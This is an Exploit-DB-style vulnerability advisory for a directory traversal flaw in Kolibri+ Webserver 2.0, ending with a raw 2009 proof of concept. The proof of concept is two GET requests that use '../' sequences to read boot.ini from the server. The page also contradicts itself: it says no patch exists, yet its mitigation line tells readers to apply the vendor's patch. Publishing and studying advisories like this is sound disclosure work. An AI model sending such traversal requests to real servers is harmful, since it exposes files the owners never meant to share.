Kolibri+ Webserver 2 , Directory Traversal Vulnerability

vendor:

Kolibri+ Webserver 2.0

by:

Usman Saeed

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Kolibri+ Webserver 2.0

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:kolibri_webserver:kolibri_webserver_2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Kolibri+ Webserver 2 , Directory Traversal Vulnerability

A directory traversal vulnerability exists in Kolibri+ Webserver 2, which allows an attacker to read arbitrary files on the server. An attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. '../') to read arbitrary files on the server.

Mitigation:

Upgrade to the latest version of Kolibri+ Webserver 2 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

#############################################################################################
#
#   Name    :   Kolibri+ Webserver 2 , Directory Traversal Vulnerability
#   Author  :   Usman Saeed
#   Company :   Xc0re Security Reasearch Group
#   Date    :   06/09/09
#   Homepage :  http://www.xc0re.net
#
#############################################################################################


[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Exploitation :


          [Directory Traversal]

GET /../../../../../../../../../boot.ini HTTP/1.0
GET /../../../../../../../../boot.ini HTTP/1.0

# milw0rm.com [2009-09-11]